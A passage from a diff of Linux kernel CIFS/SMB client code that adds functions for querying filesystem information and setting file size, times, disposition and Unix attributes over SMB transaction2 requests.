++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(VFS, "Send error in SETFSUnixInfo = %d\n", rc);
++	} else {		/* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++		if (rc)
++			rc = -EIO;	/* bad smb */
++	}
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto SETFSUnixRetry;
++
++	return rc;
++}
++
++
++
++int
++CIFSSMBQFSPosixInfo(const unsigned int xid, struct cifs_tcon *tcon,
++		   struct kstatfs *FSData)
++{
++/* level 0x201  SMB_QUERY_CIFS_POSIX_INFO */
++	TRANSACTION2_QFSI_REQ *pSMB = NULL;
++	TRANSACTION2_QFSI_RSP *pSMBr = NULL;
++	FILE_SYSTEM_POSIX_INFO *response_data;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, byte_count;
++
++	cifs_dbg(FYI, "In QFSPosixInfo\n");
++QFSPosixRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	params = 2;	/* level */
++	pSMB->TotalDataCount = 0;
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find exact max SMB PDU from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(100);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	byte_count = params + 1 /* pad */ ;
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(offsetof(struct
++			smb_com_transaction2_qfsi_req, InformationLevel) - 4);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FS_INFORMATION);
++	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_POSIX_FS_INFO);
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in QFSUnixInfo = %d\n", rc);
++	} else {		/* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++		if (rc || get_bcc(&pSMBr->hdr) < 13) {
++			rc = -EIO;	/* bad smb */
++		} else {
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++			response_data =
++			    (FILE_SYSTEM_POSIX_INFO
++			     *) (((char *) &pSMBr->hdr.Protocol) +
++				 data_offset);
++			FSData->f_bsize =
++					le32_to_cpu(response_data->BlockSize);
++			/*
++			 * much prefer larger but if server doesn't report
++			 * a valid size than 4K is a reasonable minimum
++			 */
++			if (FSData->f_bsize < 512)
++				FSData->f_bsize = 4096;
++
++			FSData->f_blocks =
++					le64_to_cpu(response_data->TotalBlocks);
++			FSData->f_bfree =
++			    le64_to_cpu(response_data->BlocksAvail);
++			if (response_data->UserBlocksAvail == cpu_to_le64(-1)) {
++				FSData->f_bavail = FSData->f_bfree;
++			} else {
++				FSData->f_bavail =
++				    le64_to_cpu(response_data->UserBlocksAvail);
++			}
++			if (response_data->TotalFileNodes != cpu_to_le64(-1))
++				FSData->f_files =
++				     le64_to_cpu(response_data->TotalFileNodes);
++			if (response_data->FreeFileNodes != cpu_to_le64(-1))
++				FSData->f_ffree =
++				      le64_to_cpu(response_data->FreeFileNodes);
++		}
++	}
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto QFSPosixRetry;
++
++	return rc;
++}
++
++
++/*
++ * We can not use write of zero bytes trick to set file size due to need for
++ * large file support. Also note that this SetPathInfo is preferred to
++ * SetFileInfo based method in next routine which is only needed to work around
++ * a sharing violation bugin Samba which this routine can run into.
++ */
++int
++CIFSSMBSetEOF(const unsigned int xid, struct cifs_tcon *tcon,
++	      const char *file_name, __u64 size, struct cifs_sb_info *cifs_sb,
++	      bool set_allocation)
++{
++	struct smb_com_transaction2_spi_req *pSMB = NULL;
++	struct smb_com_transaction2_spi_rsp *pSMBr = NULL;
++	struct file_end_of_file_info *parm_data;
++	int name_len;
++	int rc = 0;
++	int bytes_returned = 0;
++	int remap = cifs_remap(cifs_sb);
++
++	__u16 params, byte_count, data_count, param_offset, offset;
++
++	cifs_dbg(FYI, "In SetEOF\n");
++SetEOFRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->FileName, file_name,
++				       PATH_MAX, cifs_sb->local_nls, remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, file_name);
++	}
++	params = 6 + name_len;
++	data_count = sizeof(struct file_end_of_file_info);
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	pSMB->MaxDataCount = cpu_to_le16(4100);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_spi_req,
++				InformationLevel) - 4;
++	offset = param_offset + params;
++	if (set_allocation) {
++		if (tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)
++			pSMB->InformationLevel =
++				cpu_to_le16(SMB_SET_FILE_ALLOCATION_INFO2);
++		else
++			pSMB->InformationLevel =
++				cpu_to_le16(SMB_SET_FILE_ALLOCATION_INFO);
++	} else /* Set File Size */  {
++	    if (tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)
++		    pSMB->InformationLevel =
++				cpu_to_le16(SMB_SET_FILE_END_OF_FILE_INFO2);
++	    else
++		    pSMB->InformationLevel =
++				cpu_to_le16(SMB_SET_FILE_END_OF_FILE_INFO);
++	}
++
++	parm_data =
++	    (struct file_end_of_file_info *) (((char *) &pSMB->hdr.Protocol) +
++				       offset);
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
++	byte_count = 3 /* pad */  + params + data_count;
++	pSMB->DataCount = cpu_to_le16(data_count);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	parm_data->FileSize = cpu_to_le64(size);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc)
++		cifs_dbg(FYI, "SetPathInfo (file size) returned %d\n", rc);
++
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto SetEOFRetry;
++
++	return rc;
++}
++
++int
++CIFSSMBSetFileSize(const unsigned int xid, struct cifs_tcon *tcon,
++		   struct cifsFileInfo *cfile, __u64 size, bool set_allocation)
++{
++	struct smb_com_transaction2_sfi_req *pSMB  = NULL;
++	struct file_end_of_file_info *parm_data;
++	int rc = 0;
++	__u16 params, param_offset, offset, byte_count, count;
++
++	cifs_dbg(FYI, "SetFileSize (via SetFileInfo) %lld\n",
++		 (long long)size);
++	rc = small_smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB);
++
++	if (rc)
++		return rc;
++
++	pSMB->hdr.Pid = cpu_to_le16((__u16)cfile->pid);
++	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(cfile->pid >> 16));
++
++	params = 6;
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_sfi_req, Fid) - 4;
++	offset = param_offset + params;
++
++	count = sizeof(struct file_end_of_file_info);
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find exact max SMB PDU from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FILE_INFORMATION);
++	byte_count = 3 /* pad */  + params + count;
++	pSMB->DataCount = cpu_to_le16(count);
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
++	parm_data =
++		(struct file_end_of_file_info *)(((char *)pSMB) + offset + 4);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	parm_data->FileSize = cpu_to_le64(size);
++	pSMB->Fid = cfile->fid.netfid;
++	if (set_allocation) {
++		if (tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)
++			pSMB->InformationLevel =
++				cpu_to_le16(SMB_SET_FILE_ALLOCATION_INFO2);
++		else
++			pSMB->InformationLevel =
++				cpu_to_le16(SMB_SET_FILE_ALLOCATION_INFO);
++	} else /* Set File Size */  {
++	    if (tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)
++		    pSMB->InformationLevel =
++				cpu_to_le16(SMB_SET_FILE_END_OF_FILE_INFO2);
++	    else
++		    pSMB->InformationLevel =
++				cpu_to_le16(SMB_SET_FILE_END_OF_FILE_INFO);
++	}
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
++	cifs_small_buf_release(pSMB);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in SetFileInfo (SetFileSize) = %d\n",
++			 rc);
++	}
++
++	/* Note: On -EAGAIN error only caller can retry on handle based calls
++		since file handle passed in no longer valid */
++
++	return rc;
++}
++
++/* Some legacy servers such as NT4 require that the file times be set on
++   an open handle, rather than by pathname - this is awkward due to
++   potential access conflicts on the open, but it is unavoidable for these
++   old servers since the only other choice is to go from 100 nanosecond DCE
++   time and resort to the original setpathinfo level which takes the ancient
++   DOS time format with 2 second granularity */
++int
++CIFSSMBSetFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
++		    const FILE_BASIC_INFO *data, __u16 fid, __u32 pid_of_opener)
++{
++	struct smb_com_transaction2_sfi_req *pSMB  = NULL;
++	char *data_offset;
++	int rc = 0;
++	__u16 params, param_offset, offset, byte_count, count;
++
++	cifs_dbg(FYI, "Set Times (via SetFileInfo)\n");
++	rc = small_smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB);
++
++	if (rc)
++		return rc;
++
++	pSMB->hdr.Pid = cpu_to_le16((__u16)pid_of_opener);
++	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(pid_of_opener >> 16));
++
++	params = 6;
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_sfi_req, Fid) - 4;
++	offset = param_offset + params;
++
++	data_offset = (char *)pSMB +
++			offsetof(struct smb_hdr, Protocol) + offset;
++
++	count = sizeof(FILE_BASIC_INFO);
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find max SMB PDU from sess */
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FILE_INFORMATION);
++	byte_count = 3 /* pad */  + params + count;
++	pSMB->DataCount = cpu_to_le16(count);
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->Fid = fid;
++	if (tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)
++		pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_BASIC_INFO2);
++	else
++		pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_BASIC_INFO);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	memcpy(data_offset, data, sizeof(FILE_BASIC_INFO));
++	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
++	cifs_small_buf_release(pSMB);
++	if (rc)
++		cifs_dbg(FYI, "Send error in Set Time (SetFileInfo) = %d\n",
++			 rc);
++
++	/* Note: On -EAGAIN error only caller can retry on handle based calls
++		since file handle passed in no longer valid */
++
++	return rc;
++}
++
++int
++CIFSSMBSetFileDisposition(const unsigned int xid, struct cifs_tcon *tcon,
++			  bool delete_file, __u16 fid, __u32 pid_of_opener)
++{
++	struct smb_com_transaction2_sfi_req *pSMB  = NULL;
++	char *data_offset;
++	int rc = 0;
++	__u16 params, param_offset, offset, byte_count, count;
++
++	cifs_dbg(FYI, "Set File Disposition (via SetFileInfo)\n");
++	rc = small_smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB);
++
++	if (rc)
++		return rc;
++
++	pSMB->hdr.Pid = cpu_to_le16((__u16)pid_of_opener);
++	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(pid_of_opener >> 16));
++
++	params = 6;
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_sfi_req, Fid) - 4;
++	offset = param_offset + params;
++
++	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
++	data_offset = (char *)(pSMB) + offset + 4;
++
++	count = 1;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find max SMB PDU from sess */
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FILE_INFORMATION);
++	byte_count = 3 /* pad */  + params + count;
++	pSMB->DataCount = cpu_to_le16(count);
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->Fid = fid;
++	pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_DISPOSITION_INFO);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	*data_offset = delete_file ? 1 : 0;
++	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
++	cifs_small_buf_release(pSMB);
++	if (rc)
++		cifs_dbg(FYI, "Send error in SetFileDisposition = %d\n", rc);
++
++	return rc;
++}
++
++static int
++CIFSSMBSetPathInfoFB(const unsigned int xid, struct cifs_tcon *tcon,
++		     const char *fileName, const FILE_BASIC_INFO *data,
++		     const struct nls_table *nls_codepage,
++		     struct cifs_sb_info *cifs_sb)
++{
++	int oplock = 0;
++	struct cifs_open_parms oparms;
++	struct cifs_fid fid;
++	int rc;
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, 0),
++		.disposition = FILE_OPEN,
++		.path = fileName,
++		.fid = &fid,
++	};
++
++	rc = CIFS_open(xid, &oparms, &oplock, NULL);
++	if (rc)
++		goto out;
++
++	rc = CIFSSMBSetFileInfo(xid, tcon, data, fid.netfid, current->tgid);
++	CIFSSMBClose(xid, tcon, fid.netfid);
++out:
++
++	return rc;
++}
++
++int
++CIFSSMBSetPathInfo(const unsigned int xid, struct cifs_tcon *tcon,
++		   const char *fileName, const FILE_BASIC_INFO *data,
++		   const struct nls_table *nls_codepage,
++		     struct cifs_sb_info *cifs_sb)
++{
++	TRANSACTION2_SPI_REQ *pSMB = NULL;
++	TRANSACTION2_SPI_RSP *pSMBr = NULL;
++	int name_len;
++	int rc = 0;
++	int bytes_returned = 0;
++	char *data_offset;
++	__u16 params, param_offset, offset, byte_count, count;
++	int remap = cifs_remap(cifs_sb);
++
++	cifs_dbg(FYI, "In SetTimes\n");
++
++SetTimesRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->FileName, fileName,
++				       PATH_MAX, nls_codepage, remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, fileName);
++	}
++
++	params = 6 + name_len;
++	count = sizeof(FILE_BASIC_INFO);
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find max SMB PDU from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_spi_req,
++				InformationLevel) - 4;
++	offset = param_offset + params;
++	data_offset = (char *) (&pSMB->hdr.Protocol) + offset;
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
++	byte_count = 3 /* pad */  + params + count;
++
++	pSMB->DataCount = cpu_to_le16(count);
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	if (tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)
++		pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_BASIC_INFO2);
++	else
++		pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_BASIC_INFO);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	memcpy(data_offset, data, sizeof(FILE_BASIC_INFO));
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc)
++		cifs_dbg(FYI, "SetPathInfo (times) returned %d\n", rc);
++
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto SetTimesRetry;
++
++	if (rc == -EOPNOTSUPP)
++		return CIFSSMBSetPathInfoFB(xid, tcon, fileName, data,
++					    nls_codepage, cifs_sb);
++
++	return rc;
++}
++
++static void
++cifs_fill_unix_set_info(FILE_UNIX_BASIC_INFO *data_offset,
++			const struct cifs_unix_set_info_args *args)
++{
++	u64 uid = NO_CHANGE_64, gid = NO_CHANGE_64;
++	u64 mode = args->mode;
++
++	if (uid_valid(args->uid))
++		uid = from_kuid(&init_user_ns, args->uid);
++	if (gid_valid(args->gid))
++		gid = from_kgid(&init_user_ns, args->gid);
++
++	/*
++	 * Samba server ignores set of file size to zero due to bugs in some
++	 * older clients, but we should be precise - we use SetFileSize to
++	 * set file size and do not want to truncate file size to zero
++	 * accidentally as happened on one Samba server beta by putting
++	 * zero instead of -1 here
++	 */
++	data_offset->EndOfFile = cpu_to_le64(NO_CHANGE_64);
++	data_offset->NumOfBytes = cpu_to_le64(NO_CHANGE_64);
++	data_offset->LastStatusChange = cpu_to_le64(args->ctime);
++	data_offset->LastAccessTime = cpu_to_le64(args->atime);
++	data_offset->LastModificationTime = cpu_to_le64(args->mtime);
++	data_offset->Uid = cpu_to_le64(uid);
++	data_offset->Gid = cpu_to_le64(gid);
++	/* better to leave device as zero when it is  */
++	data_offset->DevMajor = cpu_to_le64(MAJOR(args->device));
++	data_offset->DevMinor = cpu_to_le64(MINOR(args->device));
++	data_offset->Permissions = cpu_to_le64(mode);
++
++	if (S_ISREG(mode))
++		data_offset->Type = cpu_to_le32(UNIX_FILE);
++	else if (S_ISDIR(mode))
++		data_offset->Type = cpu_to_le32(UNIX_DIR);
++	else if (S_ISLNK(mode))
++		data_offset->Type = cpu_to_le32(UNIX_SYMLINK);
++	else if (S_ISCHR(mode))
++		data_offset->Type = cpu_to_le32(UNIX_CHARDEV);
++	else if (S_ISBLK(mode))
++		data_offset->Type = cpu_to_le32(UNIX_BLOCKDEV);
++	else if (S_ISFIFO(mode))
++		data_offset->Type = cpu_to_le32(UNIX_FIFO);
++	else if (S_ISSOCK(mode))
++		data_offset->Type = cpu_to_le32(UNIX_SOCKET);
++}
++
++int
++CIFSSMBUnixSetFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
++		       const struct cifs_unix_set_info_args *args,
++		       u16 fid, u32 pid_of_opener)
++{
++	struct smb_com_transaction2_sfi_req *pSMB  = NULL;
++	char *data_offset;
++	int rc = 0;
++	u16 params, param_offset, offset, byte_count, count;
++
++	cifs_dbg(FYI, "Set Unix Info (via SetFileInfo)\n");
++	rc = small_smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB);
++
++	if (rc)
++		return rc;
++
++	pSMB->hdr.Pid = cpu_to_le16((__u16)pid_of_opener);
++	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(pid_of_opener >> 16));
++
++	params = 6;
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_sfi_req, Fid) - 4;
++	offset = param_offset + params;
++
++	data_offset = (char *)pSMB +
++			offsetof(struct smb_hdr, Protocol) + offset;
++
++	count = sizeof(FILE_UNIX_BASIC_INFO);
++
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find max SMB PDU from sess */
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FILE_INFORMATION);
++	byte_count = 3 /* pad */  + params + count;
++	pSMB->DataCount = cpu_to_le16(count);
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->Fid = fid;
++	pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_UNIX_BASIC);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	cifs_fill_unix_set_info((FILE_UNIX_BASIC_INFO *)data_offset, args);
++
++	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
++	cifs_small_buf_release(pSMB);
++	if (rc)
++		cifs_dbg(FYI, "Send error in Set Time (SetFileInfo) = %d\n",
++			 rc);
++
++	/* Note: On -EAGAIN error only caller can retry on handle based calls
++		since file handle passed in no longer valid */
++
++	return rc;
++}
++
++int
++CIFSSMBUnixSetPathInfo(const unsigned int xid, struct cifs_tcon *tcon,
++		       const char *file_name,
++		       const struct cifs_unix_set_info_args *args,
++		       const struct nls_table *nls_codepage, int remap)
++{
++	TRANSACTION2_SPI_REQ *pSMB = NULL;
++	TRANSACTION2_SPI_RSP *pSMBr = NULL;
++	int name_len;
++	int rc = 0;
++	int bytes_returned = 0;
++	FILE_UNIX_BASIC_INFO *data_offset;
++	__u16 params, param_offset, offset, count, byte_count;
++
++	cifs_dbg(FYI, "In SetUID/GID/Mode\n");
++setPermsRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->FileName, file_name,
++				       PATH_MAX, nls_codepage, remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, file_name);
++	}
++
++	params = 6 + name_len;
++	count = sizeof(FILE_UNIX_BASIC_INFO);
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find max SMB PDU from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_spi_req,
++				InformationLevel) - 4;
++	offset = param_offset + params;
++	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
++	data_offset = (FILE_UNIX_BASIC_INFO *)((char *) pSMB + offset + 4);
++	memset(data_offset, 0, count);
++	pSMB->DataOffset = cpu_to_le16(offset);
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
++	byte_count = 3 /* pad */  + params + count;
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->DataCount = cpu_to_le16(count);
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_UNIX_BASIC);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++
++	cifs_fill_unix_set_info(data_offset, args);
++
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc)
++		cifs_dbg(FYI, "SetPathInfo (perms) returned %d\n", rc);
++
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto setPermsRetry;
++	return rc;
++}
++
++#ifdef CONFIG_CIFS_XATTR
++/*
++ * Do a path-based QUERY_ALL_EAS call and parse the result. This is a common
++ * function used by listxattr and getxattr type calls. When ea_name is set,
++ * it looks for that attribute name and stuffs that value into the EAData
++ * buffer. When ea_name is NULL, it stuffs a list of attribute names into the
++ * buffer. In both cases, the return value is either the length of the
++ * resulting data or a negative error code. If EAData is a NULL pointer then
++ * the data isn't copied to it, but the length is returned.
++ */
++ssize_t
++CIFSSMBQAllEAs(const unsigned int xid, struct cifs_tcon *tcon,
++		const unsigned char *searchName, const unsigned char *ea_name,
++		char *EAData, size_t buf_size,
++		struct cifs_sb_info *cifs_sb)
++{
++		/* BB assumes one setup word */
++	TRANSACTION2_QPI_REQ *pSMB = NULL;
++	TRANSACTION2_QPI_RSP *pSMBr = NULL;
++	int remap = cifs_remap(cifs_sb);
++	struct nls_table *nls_codepage = cifs_sb->local_nls;
++	int rc = 0;
++	int bytes_returned;
++	int list_len;
++	struct fealist *ea_response_data;
++	struct fea *temp_fea;
++	char *temp_ptr;
++	char *end_of_smb;
++	__u16 params, byte_count, data_offset;
++	unsigned int ea_name_len = ea_name ? strlen(ea_name) : 0;
++
++	cifs_dbg(FYI, "In Query All EAs path %s\n", searchName);
++QAllEAsRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		list_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->FileName, searchName,
++				       PATH_MAX, nls_codepage, remap);
++		list_len++;	/* trailing null */
++		list_len *= 2;
++	} else {
++		list_len = copy_path_name(pSMB->FileName, searchName);
++	}
++
++	params = 2 /* level */ + 4 /* reserved */ + list_len /* includes NUL */;
++	pSMB->TotalDataCount = 0;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find exact max SMB PDU from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(CIFSMaxBufSize);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	pSMB->ParameterOffset = cpu_to_le16(offsetof(
++	struct smb_com_transaction2_qpi_req, InformationLevel) - 4);
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
